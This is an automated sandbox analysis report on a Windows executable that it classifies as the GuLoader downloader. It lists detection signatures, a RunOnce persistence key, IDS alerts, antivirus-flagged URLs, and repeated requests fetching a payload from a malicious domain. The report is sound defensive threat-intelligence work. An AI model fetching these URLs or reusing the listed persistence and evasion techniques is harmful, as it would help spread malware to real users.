Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WEAREX_IHRACAT.exe

Overview

General Information

Sample name:WEAREX_IHRACAT.exe
Analysis ID:1501093
MD5:2e620407c0b25239ef46534a34217c27
SHA1:1751f775e9e9279757ec94c9f4cf63b01af42525
SHA256:a49b3780d9a1af972b0e6d252284edff3b00e35713336456579431f1081debe4
Infos:

Detection

GuLoader
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • WEAREX_IHRACAT.exe (PID: 8804 cmdline: "C:\Users\user\Desktop\WEAREX_IHRACAT.exe" MD5: 2E620407C0B25239EF46534A34217C27)
    • WEAREX_IHRACAT.exe (PID: 6300 cmdline: "C:\Users\user\Desktop\WEAREX_IHRACAT.exe" MD5: 2E620407C0B25239EF46534A34217C27)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.6650157112.0000000001721000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000000.00000002.2455393389.00000000031C1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: New RUN Key Pointing to Suspicious Folder
      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\Pregnancy\Caterva.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\WEAREX_IHRACAT.exe, ProcessId: 6300, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Aaregang
      Sigma detected: CurrentVersion Autorun Keys Modification
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\Pregnancy\Caterva.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\WEAREX_IHRACAT.exe, ProcessId: 6300, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Aaregang

      Suricata Signatures

      Timestamp:2024-08-29T12:47:29.980026+0200
      SID:2803270
      Severity:2
      Source Port:49817
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:44:10.058869+0200
      SID:2803270
      Severity:2
      Source Port:49798
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:47:40.545730+0200
      SID:2803270
      Severity:2
      Source Port:49818
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:46:16.116813+0200
      SID:2803270
      Severity:2
      Source Port:49810
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:40:39.276679+0200
      SID:2803270
      Severity:2
      Source Port:49778
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:41:10.845968+0200
      SID:2803270
      Severity:2
      Source Port:49781
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:43:38.548806+0200
      SID:2803270
      Severity:2
      Source Port:49795
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:45:44.642511+0200
      SID:2803270
      Severity:2
      Source Port:49807
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:48:01.626916+0200
      SID:2803270
      Severity:2
      Source Port:49820
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:45:02.626566+0200
      SID:2803270
      Severity:2
      Source Port:49803
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:42:13.957536+0200
      SID:2803270
      Severity:2
      Source Port:49787
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:45:55.128979+0200
      SID:2803270
      Severity:2
      Source Port:49808
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:47:51.113817+0200
      SID:2803270
      Severity:2
      Source Port:49819
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:44:31.092272+0200
      SID:2803270
      Severity:2
      Source Port:49800
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:45:23.646662+0200
      SID:2803270
      Severity:2
      Source Port:49805
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:47:19.408610+0200
      SID:2803270
      Severity:2
      Source Port:49816
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:45:13.157708+0200
      SID:2803270
      Severity:2
      Source Port:49804
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:41:21.355961+0200
      SID:2803270
      Severity:2
      Source Port:49782
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:48:12.140527+0200
      SID:2803270
      Severity:2
      Source Port:49821
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:42:03.439873+0200
      SID:2803270
      Severity:2
      Source Port:49786
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:40:49.799928+0200
      SID:2803270
      Severity:2
      Source Port:49779
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:44:41.578317+0200
      SID:2803270
      Severity:2
      Source Port:49801
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:43:49.031831+0200
      SID:2803270
      Severity:2
      Source Port:49796
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:41:00.329177+0200
      SID:2803270
      Severity:2
      Source Port:49780
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:44:20.589165+0200
      SID:2803270
      Severity:2
      Source Port:49799
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:42:35.005423+0200
      SID:2803270
      Severity:2
      Source Port:49789
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:46:47.848269+0200
      SID:2803270
      Severity:2
      Source Port:49813
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:44:52.095797+0200
      SID:2803270
      Severity:2
      Source Port:49802
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:41:42.381784+0200
      SID:2803270
      Severity:2
      Source Port:49784
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:46:37.342240+0200
      SID:2803270
      Severity:2
      Source Port:49812
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:46:05.614459+0200
      SID:2803270
      Severity:2
      Source Port:49809
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:43:17.242681+0200
      SID:2803270
      Severity:2
      Source Port:49793
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:42:56.123591+0200
      SID:2803270
      Severity:2
      Source Port:49791
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:46:58.386091+0200
      SID:2803270
      Severity:2
      Source Port:49814
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:41:31.868230+0200
      SID:2803270
      Severity:2
      Source Port:49783
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:43:06.681213+0200
      SID:2803270
      Severity:2
      Source Port:49792
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:46:26.601577+0200
      SID:2803270
      Severity:2
      Source Port:49811
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:42:45.555184+0200
      SID:2803270
      Severity:2
      Source Port:49790
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:43:28.012773+0200
      SID:2803270
      Severity:2
      Source Port:49794
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:43:59.510821+0200
      SID:2803270
      Severity:2
      Source Port:49797
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:41:52.906252+0200
      SID:2803270
      Severity:2
      Source Port:49785
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:47:08.891767+0200
      SID:2803270
      Severity:2
      Source Port:49815
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:42:24.464710+0200
      SID:2803270
      Severity:2
      Source Port:49788
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:45:34.136906+0200
      SID:2803270
      Severity:2
      Source Port:49806
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:40:18.273315+0200
      SID:2803270
      Severity:2
      Source Port:49776
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:2024-08-29T12:40:28.757039+0200
      SID:2803270
      Severity:2
      Source Port:49777
      Destination Port:443
      Protocol:TCP
      Classtype:Potentially Bad Traffic

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus detection for URL or domain
      Source: https://gitak.top/dmAaHCQMI79.bin/A~Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.bin5Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.bin)Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.bin6Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.bin/9~Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.bin6Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.bin0Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.binM~Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.bin/Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.binDAvira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.binNJAvira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.bine~Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.binAvira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.binY~Avira URL Cloud: Label: malware
      Source: https://gitak.top/W~Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.bin/o~Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.binRAvira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.bin/Y~Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.binRAvira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.binXAvira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.bin/K~vAvira URL Cloud: Label: malware
      Source: https://gitak.top/e~Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.binKAvira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.bin-~Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.binXAvira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.bino~Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.binA~Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.binK~vAvira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.binAvira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.binDAvira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.binfAvira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.bin9~Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.bin/M~Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.binceAvira URL Cloud: Label: malware
      Source: https://gitak.top/7~Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.binqAvira URL Cloud: Label: malware
      Source: https://gitak.top/A~Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.binW~Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.bin/7~Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.binzAvira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.binlAvira URL Cloud: Label: malware
      Source: https://gitak.top/Avira URL Cloud: Label: malware
      Source: https://gitak.top/M~Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.binc~Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.bin/e~Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.binMicrosoftAvira URL Cloud: Label: malware
      Source: https://gitak.top/K~vAvira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.binlAvira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.binzAvira URL Cloud: Label: malware
      Source: https://gitak.top/MyAvira URL Cloud: Label: malware
      Source: https://gitak.top/Y~Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.bin7~Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.bin/W~Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.bin/c~Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.bin(Avira URL Cloud: Label: malware
      Source: https://gitak.top/dmAaHCQMI79.binAuthorityAvira URL Cloud: Label: malware
      Source: https://gitak.top/o~Avira URL Cloud: Label: malware
      Source: https://gitak.top/9~Avira URL Cloud: Label: malware
      Multi AV Scanner detection for domain / URL
      Source: gitak.topVirustotal: Detection: 22%Perma Link
      Source: https://gitak.top/dmAaHCQMI79.binVirustotal: Detection: 19%Perma Link
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\Pregnancy\Caterva.exeReversingLabs: Detection: 57%
      Multi AV Scanner detection for submitted file
      Source: WEAREX_IHRACAT.exeReversingLabs: Detection: 57%
      Source: WEAREX_IHRACAT.exeVirustotal: Detection: 70%Perma Link
      Source: WEAREX_IHRACAT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 172.67.207.219:443 -> 192.168.11.20:49776 version: TLS 1.2
      Source: Binary string: mshtml.pdb source: WEAREX_IHRACAT.exe, 00000002.00000001.1798696574.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: mshtml.pdbUGP source: WEAREX_IHRACAT.exe, 00000002.00000001.1798696574.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeCode function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405770
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeCode function: 0_2_0040622B FindFirstFileW,FindClose,0_2_0040622B
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49776 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49778 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49782 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49806 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49786 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49781 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49779 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49787 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49780 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49797 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49791 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49783 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49794 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49792 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49784 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49798 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49793 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49788 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49814 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49777 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49808 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49807 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49799 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49795 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49790 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49785 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49816 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49819 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49801 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49800 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49796 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49789 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49818 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49803 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49815 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49802 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49821 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49809 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49804 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49817 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49813 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49810 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49805 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49812 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49811 -> 172.67.207.219:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49820 -> 172.67.207.219:443
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
